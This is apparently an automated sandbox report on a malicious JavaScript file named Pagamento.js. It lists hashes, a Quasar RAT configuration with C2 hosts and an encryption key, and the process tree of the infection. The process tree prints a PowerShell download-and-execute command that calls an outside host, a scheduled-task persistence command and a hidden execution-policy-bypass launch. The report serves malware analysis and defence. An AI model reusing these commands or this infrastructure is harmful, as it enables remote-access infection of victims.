Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
29-05-2023 23:15
Static task
static1
Behavioral task
behavioral1
Sample
Pagamento.js
Resource
win7-20230220-en
General
-
Target
Pagamento.js
-
Size
169KB
-
MD5
c0871f07733a3727e82c64aacda9a85b
-
SHA1
bf364b5b56ee65351a0bc5bca249ddeed5705e76
-
SHA256
3eafb742af9d3a8bbbe4bd90b19d175ea4b698505cc5623594d0f13ba883692e
-
SHA512
56f29de9c7b558ad3e24ee52378ce297bccfcc95bdeb74f3ec463493fe25dd2f869f1d74ede8238fe82b9bb11b9f088d47dea1df53f2a0a1b3a7a6c0ad29217e
-
SSDEEP
3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKLfbT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokX0bZ0M/EaZ8M
Malware Config
Extracted
https://propagandaetrafego.com/b.jpg
Extracted
https://propagandaetrafego.com/v1.txt
Extracted
quasar
2.7.0.0
OP23
vhf.sytes.net:4783
15.235.109.170:4782
2vrOj8wCud9msk5z8w
-
encryption_key
ywxbR3BS4B6Rtb7nv9vB
-
install_name
Venom.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Venom Client Startup
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5012-172-0x0000000000400000-0x0000000000510000-memory.dmp family_quasar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 8 4104 powershell.exe 57 3656 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 59 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3656 set thread context of 5012 3656 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4104 powershell.exe 4104 powershell.exe 3656 powershell.exe 3656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 4104 powershell.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeDebugPrivilege 5012 RegSvcs.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
wscript.exepowershell.exeWScript.execmd.execmd.exepowershell.exedescription pid process target process PID 4972 wrote to memory of 4104 4972 wscript.exe powershell.exe PID 4972 wrote to memory of 4104 4972 wscript.exe powershell.exe PID 4104 wrote to memory of 1772 4104 powershell.exe schtasks.exe PID 4104 wrote to memory of 1772 4104 powershell.exe schtasks.exe PID 1404 wrote to memory of 788 1404 WScript.exe cmd.exe PID 1404 wrote to memory of 788 1404 WScript.exe cmd.exe PID 788 wrote to memory of 4644 788 cmd.exe cmd.exe PID 788 wrote to memory of 4644 788 cmd.exe cmd.exe PID 4644 wrote to memory of 3656 4644 cmd.exe powershell.exe PID 4644 wrote to memory of 3656 4644 cmd.exe powershell.exe PID 3656 wrote to memory of 5012 3656 powershell.exe RegSvcs.exe PID 3656 wrote to memory of 5012 3656 powershell.exe RegSvcs.exe PID 3656 wrote to memory of 5012 3656 powershell.exe RegSvcs.exe PID 3656 wrote to memory of 5012 3656 powershell.exe RegSvcs.exe PID 3656 wrote to memory of 5012 3656 powershell.exe RegSvcs.exe PID 3656 wrote to memory of 5012 3656 powershell.exe RegSvcs.exe PID 3656 wrote to memory of 5012 3656 powershell.exe RegSvcs.exe PID 3656 wrote to memory of 5012 3656 powershell.exe RegSvcs.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Pagamento.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn PDF /tr C:\ProgramData\PDF\PDF.vbs3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\PDF\PDF.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF.ps1"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF.ps1"4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\PDF\1.batFilesize
89B
MD5a7f20549327da521bf176b6faa76e623
SHA1b9b22202b9d3d43ffa6cbf2f3f81dc7f5b06c605
SHA256a2099940d9f7f9a0a603a5a36ef2b24eef49f2cb428539949a6d75261faaba46
SHA5125cac6f996aa1bb4dd11a39d3001da243c6f020bc1a3d86a36ec773d45e479514b006e3b3d8782b1eaab628d0fefdb987495308b9c88f38667f875179771f4823
-
C:\ProgramData\PDF\PDF.ps1Filesize
123KB
MD5c88e3dee4837866917307a16170ffc48
SHA152600186a12ba1301d388a3d07a3ac1086c12375
SHA2564662f9bc745e25e9af52df90590449772f8cc5a13c4c4ba13fbe42e7ecc82b73
SHA5120b4edca40b32d9e4105fe79bdeace659253b626d15d6b218c8ea8f0288cacb2feb0644f1ef84a02bc9e402340910a2c2b0d0ee13c5697b1cdddf0c4d0159bea3
-
C:\ProgramData\PDF\PDF.vbsFilesize
120B
MD530e4773314799aa0e1fd7761cae6e609
SHA1d1b5a371a7555e99a7602ae6ee8028ac0f0462c4
SHA256dc592583d072f325b7a0a54d53499f32ef95c731344cc10400f0bb03e7db4720
SHA512fcbeca634cb6fe2d0ea4f726f09b4a35917615467a562e9d73cd235cd337bb797fb6a996f0569e83f4f858c0226b84fbd2d0721bea47d1039e5ffe6ebca0bb8d
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ac902dcb52cf1e5b64743d0ed0635dbd
SHA1f88a91c878f35374a7f7264de1594f3e1a4492b8
SHA2563b31733ba1fbf536fd9c7c1641dc7b6f956b299838524955d9209f2d33fe5b24
SHA51213fa35c6ff7857ab8051ab4e618e119de197d85b0bf8fa53eae70fe4e12003ff554c63d1618ffee1b19da8183172a37f0f686a9664012e3c1241f0b648bef13e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svrs4kc5.xhq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/3656-171-0x00000215B7370000-0x00000215B7380000-memory.dmpFilesize
64KB
-
memory/3656-170-0x00000215B7370000-0x00000215B7380000-memory.dmpFilesize
64KB
-
memory/4104-151-0x00000208EC600000-0x00000208EC610000-memory.dmpFilesize
64KB
-
memory/4104-152-0x00000208EC600000-0x00000208EC610000-memory.dmpFilesize
64KB
-
memory/4104-133-0x00000208EC580000-0x00000208EC5A2000-memory.dmpFilesize
136KB
-
memory/4104-150-0x00000208EC600000-0x00000208EC610000-memory.dmpFilesize
64KB
-
memory/4104-145-0x00000208EC600000-0x00000208EC610000-memory.dmpFilesize
64KB
-
memory/4104-144-0x00000208EC600000-0x00000208EC610000-memory.dmpFilesize
64KB
-
memory/4104-143-0x00000208EC600000-0x00000208EC610000-memory.dmpFilesize
64KB
-
memory/5012-172-0x0000000000400000-0x0000000000510000-memory.dmpFilesize
1.1MB
-
memory/5012-174-0x0000000005540000-0x0000000005AE4000-memory.dmpFilesize
5.6MB
-
memory/5012-175-0x00000000050B0000-0x0000000005142000-memory.dmpFilesize
584KB
-
memory/5012-176-0x00000000051A0000-0x00000000051B0000-memory.dmpFilesize
64KB
-
memory/5012-177-0x00000000052B0000-0x0000000005316000-memory.dmpFilesize
408KB
-
memory/5012-178-0x0000000005EB0000-0x0000000005EC2000-memory.dmpFilesize
72KB
-
memory/5012-179-0x00000000062E0000-0x000000000631C000-memory.dmpFilesize
240KB
-
memory/5012-180-0x0000000006A30000-0x0000000006A3A000-memory.dmpFilesize
40KB
-
memory/5012-181-0x00000000051A0000-0x00000000051B0000-memory.dmpFilesize
64KB